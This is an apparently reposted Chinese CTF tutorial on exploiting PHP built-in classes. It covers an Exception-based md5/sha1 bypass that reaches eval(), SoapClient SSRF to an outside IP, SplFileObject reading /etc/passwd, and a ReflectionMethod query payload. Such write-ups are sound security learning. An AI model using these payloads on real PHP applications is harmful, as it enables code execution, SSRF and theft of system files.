2. 程式人生 > 其它 >[php安全]原生類的利用

[php安全]原生類的利用

阿新 發佈:2021-12-07

php原生類的利用

檢視原生類中具有魔法函式的類 
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__toString',
            '__wakeup',
            '__call',
            '__callStatic',
            '__get',
            '__set',
            '__isset',
            '__unset',
            '__invoke',
            '__set_state'    // 可以根據題目環境將指定的方法新增進來, 來遍歷存在指定方法的原生類
        ))) {
            print $class . '::' . $method . "\n"."<br/>";
        }
    }
}
/**
Exception::__wakeup
Exception::__toString
ErrorException::__wakeup
ErrorException::__toString
Error::__wakeup
Error::__toString
ParseError::__wakeup
ParseError::__toString
TypeError::__wakeup
TypeError::__toString
ArithmeticError::__wakeup
ArithmeticError::__toString
DivisionByZeroError::__wakeup
DivisionByZeroError::__toString
Generator::__wakeup
ClosedGeneratorException::__wakeup
ClosedGeneratorException::__toString
DateTime::__wakeup
DateTime::__set_state
DateTimeImmutable::__wakeup
DateTimeImmutable::__set_state
DateTimeZone::__wakeup
DateTimeZone::__set_state
DateInterval::__wakeup
DateInterval::__set_state
DatePeriod::__wakeup
DatePeriod::__set_state
LogicException::__wakeup
LogicException::__toString
BadFunctionCallException::__wakeup
BadFunctionCallException::__toString
BadMethodCallException::__wakeup
BadMethodCallException::__toString
DomainException::__wakeup
DomainException::__toString
InvalidArgumentException::__wakeup
InvalidArgumentException::__toString
LengthException::__wakeup
LengthException::__toString
OutOfRangeException::__wakeup
OutOfRangeException::__toString
RuntimeException::__wakeup
RuntimeException::__toString
OutOfBoundsException::__wakeup
OutOfBoundsException::__toString
OverflowException::__wakeup
OverflowException::__toString
RangeException::__wakeup
RangeException::__toString
UnderflowException::__wakeup
UnderflowException::__toString
UnexpectedValueException::__wakeup
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
SplFixedArray::__wakeup
ReflectionException::__wakeup
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionType::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
ReflectionZendExtension::__toString
AssertionError::__wakeup
AssertionError::__toString
DOMException::__wakeup
DOMException::__toString
PDOException::__wakeup
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
CURLFile::__wakeup
mysqli_sql_exception::__wakeup
mysqli_sql_exception::__toString
PharException::__wakeup
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
 */

原生類繞 Exception Error 繞過md5/sha1(其實還可以進行xss,可以自行搜尋)

有時候,在題目中出現了反序列化,但是沒有給出具體類,一般不是原始碼洩露再審計,就是利用php的原生類。

[2020 Geek Challenge GreatPHP]

<?php
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
        }
    }
}

if (isset($_GET['great'])){
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

?>

我們的目的就是繞過md5和sha1的校驗,最後執行evilCode。
看到md5和sha1的比較,最先想到的就是利用md5和sha1都無法解析陣列繞過,事實證明確實可以繞過md5和sha1的檢測。但卻無法執行程式碼。除錯發現,eval無法解析陣列變數,並返回錯誤。。。這不就直接卡死在這兒。 強型別匹配,除了利用函式解析漏洞,就只能真的靠md5值真相等了。但直接強行找兩個檔案md5值相等,而且有一個其中還是可以執行的程式碼,我覺得這不太可能把!!!

看了大師傅的WP,發現可以用Exception類進行繞過。

$str = "?>"; 中為什麼要在前面加上一個 ?> 呢?因為 Exception 類與 Error 的 __toString 方法在eval()函式中輸出的結果是不可控的,即輸出的報錯資訊中,payload前面還有一段雜亂資訊“Error: ”

原生類 SoapClient 進行SSRF

SoapClient是php拓展用於發起web請求的工具。它內建一個__call魔術方法,當被觸發時,會進行web訪問請求。這個比較常用

<?php
$a = new SoapClient(null,array('location'=>'http://47.xxx.xxx.72:2333/aaa', 'uri'=>'http://47.xxx.xxx.72:2333'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();    // 隨便呼叫物件中不存在的方法, 觸發__call方法進行ssrf
?>

原生類進行目錄遍歷

DirectoryIterator 
FilesystemIterator 
GlobIterator

DirectoryIterator與glob://協議結合將無視open_basedir對目錄的限制,可以用來列舉出指定目錄下的檔案。

原生類進行讀取檔案

<?php
$context = new SplFileObject('/etc/passwd');
foreach($context as $f){
    echo($f);
}

使用 ReflectionMethod 類獲取類方法的相關資訊

[2021 CISCN]easy_source

<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];    // 傳入原生類名
$rb=$_GET["rb"];    // 傳入類屬性
$ra=$_GET["ra"];    // 傳入類屬性
$rd=$_GET["rd"];    // 傳入類方法
$method= new $rc($ra, $rb);    // 例項化剛才傳入的原生類
var_dump($method->$rd());     // 呼叫類中的方法

利用 PHP 內建類中的 ReflectionMethod 類中的 getDocComment() 方法來讀取 User 類裡面各個函式的註釋。

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

[Refer](https://whoamianony.top/2021/03/10/Web安全/PHP 原生類的利用小結/)

相關推薦

[php安全]原生利用

php原生利用 檢視原生中具有魔法函式的 $classes = get_declared_classes(); foreach ($classes as $class) {

關於如何利用php原生進行XSS

在CTF中,這一型別的題目一般會在程式碼中給出反序列化點,但是卻找不到pop鏈,類似於[BJDCTF 2nd]xss之光這一題,通過GitHack下載程式碼後,發現如下:

PHP萬能token--純原生

技術標籤:PHP資料校驗phpredis其他經驗分享 所有的專案中都會涉及到身份鑑權的使用,而目前最常用的是通過token(令牌)進行鑑權;

php安全攻防利用檔案上傳漏洞與繞過技巧詳解

目錄前言檔案上傳漏洞的一些場景場景一:前端程式碼白名單判斷.jpg|.png|.gif字尾場景二:後端程式碼檢查Content-type欄位場景三:程式碼黑名單判斷.asp|.aspx|.php|.jsp字尾場景四:程式碼擴大黑名單判斷繞過方式—

PHP 自動載入原理與用法例項分析

本文例項講述了PHP 自動載入原理與用法。分享給大家供大家參考,具體如下:

PHP陣列array常見操作示例

本文例項講述了PHP陣列array常見操作。分享給大家供大家參考,具體如下:

PHP基於phpqrcode庫生成二維碼過程解析

phpqrcode庫官網下載地址: https://sourceforge.net/projects/phpqrcode/ 1.我們先看看php是怎麼生成二維碼的  

原生JS利用transform實現banner的無限滾動示例程式碼

功能 預設情況無限迴圈向右移動 點選數字切換到對應圖片 點選左右切換可切換圖片

PHP Socket程式設計 之 利用 fsockopen() 函式開放埠掃描器的例項

1、前言 本文利用 fsockopen() 函式,編寫一個功能簡單的埠掃描器。 2、關鍵技術

PHP基於phpqrcode生成二維碼的方法示例詳解

HP QR Code是一個PHP二維碼生成庫,利用它可以輕鬆生成二維碼,官網提供了下載和多個演示demo,檢視地址:

php偽隨機數漏洞利用

php偽隨機數 相關函式 mt_rand() mt_rand函式有兩個可選引數 min 和 max,如果沒有提供可選引數,mt_rand函式將返回返回 0 到 mt_getrandmax() 之間的偽隨機數。例如想要 5 到 15(包括 5 和 15)之間的隨機

IDEA實現同一個啟動利用不同埠啟動多服務

問題現象: 今天在微服務學習中,遇到一個小問題: 如何實現同一個啟動利用不同埠啟動多服務?

PHP安全問題總結之有哪些

1、XSSCross-SiteScripting(跨站指令碼***)簡稱XSS,是一種程式碼注入***。***者通過在目標網站上注入惡意指令碼,使之在使用者的瀏覽器上執行。利用這些惡意指令碼,***者可獲取使用者的敏感資訊如Cookie、Sessio

安全過濾

技術標籤:自用庫 <?php namespace app\\common\\library; use Exception; /** * 安全過濾

PHP安全配置優化詳解

由於指令碼語言和早期版本設計的諸多原因,php專案存在不少安全隱患。從配置選項來看,可以做如下的優化。

php BCmath 封裝

<?php /** * BCmath 封裝 * Calc::init(10)->add(1,2,3)->sub(1,2)->mul(4, 5)->value(2); // (10+1+2+3-1-2)*4*5 最後 get 保留 2位小數

PHP 安全的電子郵件

PHP E-mail 注入 首先,請看上一節中的 PHP 程式碼: <html> <body> <?php if (isset($_REQUEST[\'email\']))

多執行緒的概念-》歷史,定義,執行緒安全

目錄參考多執行緒的歷史併發和並行執行緒的優勢執行緒的風險執行緒的作用域什麼是執行緒安全術語:竟態條件常見的解決辦法注意點多執行緒如何安全建立物件多執行緒如何安全銷燬物件保證執行緒安全的幾個方式

php的Snoopy案例講解

的Snoopy 獲取請求裡面的所有連結,直接使用fetchlinks就可以,獲取所有文字資訊使用fetchtext(其內部還是使用正則表示式在進行處理),還有其它較多的功能,如模擬提交表單等。

spring通過代理獲取原生

package com.chilly.utils;import org.springframework.aop.framework.AdvisedSupport;import org.springframework.aop.framework.AopProxy;import org.springframework.aop.support.AopUtils;import java.lang.ref